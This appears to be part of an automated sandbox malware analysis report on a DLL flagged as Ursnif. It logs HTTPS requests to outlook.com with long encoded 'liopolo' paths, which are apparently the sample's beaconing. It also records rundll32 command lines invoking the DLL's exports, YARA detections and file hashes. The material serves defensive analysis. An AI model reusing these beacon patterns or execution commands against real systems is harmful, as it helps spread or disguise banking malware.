                                                                                          2021-10-11 20:50:24 UTC2INData Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 4f 62 6a 65 63 74 20 4d 6f 76 65 64 3c 2f 68 31 3e 54 68 69 73 20 64 6f 63 75 6d 65 6e 74 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 73 6e 2e 63 6f 6d 2f 6d 61 69 6c 2f 6c 69 6f 70 6f 6c 6f 2f 52 53 54 4f 6b 4a 43 42 48 63 51 54 6c 58 33 37 32 6b 56 55 2f 58 62 45 54 35 33 32 55 75 6b 71 33 79 78 50 66 65 67 41 2f 72 4b 38 6a 67 5f 32 46 59 66 49 69 4e 45 31 53 6e 5f 32 46 46 43 2f 54 7a 42 33 67 42 63 32 32 4e 54 38 57 2f 53 45 70 43 61 59 42 68 2f 4e 7a 5f 32 46 66 5a 52 45 63 47 5f 32 42 4c 67 4d 7a 30 41 6d 5a 77 2f 48 65 66 30 43
                                                                                          Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/RSTOkJCBHcQTlX372kVU/XbET532Uukq3yxPfegA/rK8jg_2FYfIiNE1Sn_2FFC/TzB3gBc22NT8W/SEpCaYBh/Nz_2FfZREcG_2BLgMz0AmZw/Hef0C


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          2192.168.2.54978540.97.161.50443C:\Windows\System32\loaddll32.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2021-10-11 20:51:06 UTC2OUTGET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                          Host: outlook.com
                                                                                          2021-10-11 20:51:07 UTC3INHTTP/1.1 301 Moved Permanently
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Location: https://www.outlook.com/signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre
                                                                                          Server: Microsoft-IIS/10.0
                                                                                          request-id: 0d39011c-5f71-d4f2-94a2-b4740c04222e
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          X-FEServer: MWHPR11CA0029
                                                                                          X-RequestId: 2496765a-2f5e-4b25-a5c1-1a7921663dbf
                                                                                          MS-CV: HAE5DXFf8tSUorR0DAQiLg.0
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-FEServer: MWHPR11CA0029
                                                                                          Date: Mon, 11 Oct 2021 20:51:06 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          3192.168.2.54978652.98.152.242443C:\Windows\System32\loaddll32.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2021-10-11 20:51:07 UTC3OUTGET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                          Host: www.outlook.com
                                                                                          2021-10-11 20:51:07 UTC4INHTTP/1.1 301 Moved Permanently
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Location: https://outlook.office365.com/signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre
                                                                                          Server: Microsoft-IIS/10.0
                                                                                          request-id: 20c73dfc-91cc-b1e4-fc6c-e6c0f5a079a5
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          X-FEServer: FR0P281CA0081
                                                                                          X-RequestId: b31cb493-e0fd-45f3-b44e-e5d953cc9c82
                                                                                          MS-CV: /D3HIMyR5LH8bObA9aB5pQ.0
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-FEServer: FR0P281CA0081
                                                                                          Date: Mon, 11 Oct 2021 20:51:06 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          4192.168.2.54978752.97.137.242443C:\Windows\System32\loaddll32.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2021-10-11 20:51:07 UTC4OUTGET /signup/liopolo/EuZblQ13lpnT1_2FzhaYNX/9DXpZrPFMYrsq/dxj154wY/JAW5hNQoWqKA7wTGhce2uZY/F4RH4ulZh5/qZAwJe6y_2FhRpcVZ/_2FftU4d_2F1/ncf06OzMdnM/jLfWuxaFwKbqRf/GRnLiE4QaJlnb9UDHRbBZ/_2BsUw81Z38LOSBN/zOtYMdMXw3vN_2F/SJ30GHS9BmBl/h7ckpVr5N/F.jre HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                          Host: outlook.office365.com
                                                                                          2021-10-11 20:51:07 UTC5INHTTP/1.1 404 Not Found
                                                                                          Content-Length: 1245
                                                                                          Content-Type: text/html
                                                                                          Server: Microsoft-IIS/10.0
                                                                                          request-id: 42a9a6e9-6dd8-e4f4-89ca-fa996edc4ee9
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          X-CalculatedFETarget: AM0PR03CU001.internal.outlook.com
                                                                                          X-BackEndHttpStatus: 404
                                                                                          X-FEProxyInfo: AM0PR03CA0028.EURPRD03.PROD.OUTLOOK.COM
                                                                                          X-CalculatedBETarget: AM0P195MB0754.EURP195.PROD.OUTLOOK.COM
                                                                                          X-BackEndHttpStatus: 404
                                                                                          X-RUM-Validated: 1
                                                                                          X-Proxy-RoutingCorrectness: 1
                                                                                          X-Proxy-BackendServerStatus: 404
                                                                                          MS-CV: 6aapQtht9OSJyvqZbtxO6Q.1.1
                                                                                          X-FEServer: AM0PR03CA0028
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-FEServer: AM6P195CA0091
                                                                                          Date: Mon, 11 Oct 2021 20:51:06 GMT
                                                                                          Connection: close
                                                                                          2021-10-11 20:51:07 UTC5INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          5192.168.2.54978840.97.161.50443C:\Windows\System32\loaddll32.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2021-10-11 20:51:07 UTC7OUTGET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                          Host: outlook.com
                                                                                          2021-10-11 20:51:07 UTC7INHTTP/1.1 301 Moved Permanently
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Location: https://www.outlook.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre
                                                                                          Server: Microsoft-IIS/10.0
                                                                                          request-id: 147732a4-d3b1-c9bb-f944-8ef989c698f5
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          X-FEServer: MWHPR11CA0038
                                                                                          X-RequestId: 669cb4a2-e956-4302-840a-f8c92f7287f1
                                                                                          MS-CV: pDJ3FLHTu8n5RI75icaY9Q.0
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-FEServer: MWHPR11CA0038
                                                                                          Date: Mon, 11 Oct 2021 20:51:07 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          6192.168.2.54978952.98.208.66443C:\Windows\SysWOW64\rundll32.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2021-10-11 20:51:08 UTC8OUTGET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                          Host: www.outlook.com
                                                                                          2021-10-11 20:51:08 UTC8INHTTP/1.1 301 Moved Permanently
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Location: https://outlook.office365.com/signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre
                                                                                          Server: Microsoft-IIS/10.0
                                                                                          request-id: c3b60ebc-4628-a210-61a3-c0befcc5de97
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          X-FEServer: AS9PR06CA0083
                                                                                          X-RequestId: 6a98d4fd-3718-43df-872f-1dc2d4341b22
                                                                                          MS-CV: vA62wyhGEKJho8C+/MXelw.0
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-FEServer: AS9PR06CA0083
                                                                                          Date: Mon, 11 Oct 2021 20:51:07 GMT
                                                                                          Connection: close
                                                                                          Content-Length: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          7192.168.2.54979040.101.9.178443C:\Windows\SysWOW64\rundll32.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          2021-10-11 20:51:08 UTC9OUTGET /signup/liopolo/OF4gRPjTZUDlGYAAVvEf/5pYiOfrf0jvlgxY8qHh/p55dSmorxy15cOpOjCNG64/UjL6twzH0ZDT9/vemXw0_2/BHJIawobBFS9v634s8Jd0nQ/EDL0vwxYRK/YS70ZLCNhojiUZnDZ/Tzx6t3xNPD_2/BtypzVe3uXX/kvPQnvsonQKCq7/2tOcdfZqZfkF2YDmPA0MA/3AJg52.jre HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                                                                                          Host: outlook.office365.com
                                                                                          2021-10-11 20:51:08 UTC9INHTTP/1.1 404 Not Found
                                                                                          Content-Length: 1245
                                                                                          Content-Type: text/html
                                                                                          Server: Microsoft-IIS/10.0
                                                                                          request-id: 6a56c307-e9c6-c4f1-93bd-eb8372a66b3c
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          X-CalculatedBETarget: AM5PR0202MB2546.eurprd02.prod.outlook.com
                                                                                          X-BackEndHttpStatus: 404
                                                                                          X-Proxy-RoutingCorrectness: 1
                                                                                          X-Proxy-BackendServerStatus: 404
                                                                                          MS-CV: B8NWasbp8cSTveuDcqZrPA.1
                                                                                          X-Powered-By: ASP.NET
                                                                                          X-FEServer: AM5PR0201CA0014
                                                                                          Date: Mon, 11 Oct 2021 20:51:07 GMT
                                                                                          Connection: close
                                                                                          2021-10-11 20:51:08 UTC10INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
                                                                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


                                                                                          Code Manipulations

                                                                                          Statistics

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          Analysis Process: loaddll32.exe PID: 3708 Parent PID: 5996

                                                                                          General

                                                                                          Start time:22:48:26
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\System32\loaddll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll'
                                                                                          Imagebase:0x1a0000
                                                                                          File size:893440 bytes
                                                                                          MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.445970079.0000000000710000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.496226518.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493105528.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.539408777.0000000002BAB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493430312.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.643304809.00000000025C9000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493160476.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493225744.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493018858.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.493315813.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.627710789.00000000029AF000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.492948682.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.492874402.0000000002D28000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.584685857.0000000002AAD000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          Reputation:moderate

                                                                                          Analysis Process: cmd.exe PID: 6044 Parent PID: 3708

                                                                                          General

                                                                                          Start time:22:48:27
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                                                                                          Imagebase:0x150000
                                                                                          File size:232960 bytes
                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Analysis Process: rundll32.exe PID: 6048 Parent PID: 3708

                                                                                          General

                                                                                          Start time:22:48:27
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                                                                                          Imagebase:0x13d0000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.412556442.00000000012F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:high

                                                                                          Analysis Process: rundll32.exe PID: 5172 Parent PID: 6044

                                                                                          General

                                                                                          Start time:22:48:27
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                                                                                          Imagebase:0x13d0000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.413015029.0000000000C50000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.493384184.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495833848.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.540595897.00000000050CB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495340771.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.586659042.0000000004FCD000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496119591.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495987344.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.495528986.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496654306.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496183449.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.496285299.0000000005248000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.630148889.0000000004ECF000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.645427360.0000000004D09000.00000004.00000040.sdmp, Author: Joe Security
                                                                                          Reputation:high

                                                                                          Analysis Process: rundll32.exe PID: 4680 Parent PID: 3708

                                                                                          General

                                                                                          Start time:22:48:32
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
                                                                                          Imagebase:0x13d0000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.436255990.0000000003420000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:high

                                                                                          Analysis Process: rundll32.exe PID: 3056 Parent PID: 3708

                                                                                          General

                                                                                          Start time:22:48:39
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
                                                                                          Imagebase:0x13d0000
                                                                                          File size:61952 bytes
                                                                                          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.444240615.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security
                                                                                          Reputation:high

                                                                                          Analysis Process: WerFault.exe PID: 476 Parent PID: 6048

                                                                                          General

                                                                                          Start time:22:50:16
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6048 -s 892
                                                                                          Imagebase:0x10c0000
                                                                                          File size:434592 bytes
                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Analysis Process: WerFault.exe PID: 984 Parent PID: 4680

                                                                                          General

                                                                                          Start time:22:50:17
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4680 -s 636
                                                                                          Imagebase:0x10c0000
                                                                                          File size:434592 bytes
                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high

                                                                                          Analysis Process: WerFault.exe PID: 2100 Parent PID: 3056

                                                                                          General

                                                                                          Start time:22:50:25
                                                                                          Start date:11/10/2021
                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 872
                                                                                          Imagebase:0x10c0000
                                                                                          File size:434592 bytes
                                                                                          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language

                                                                                          Disassembly

                                                                                          Code Analysis

                                                                                          Reset < >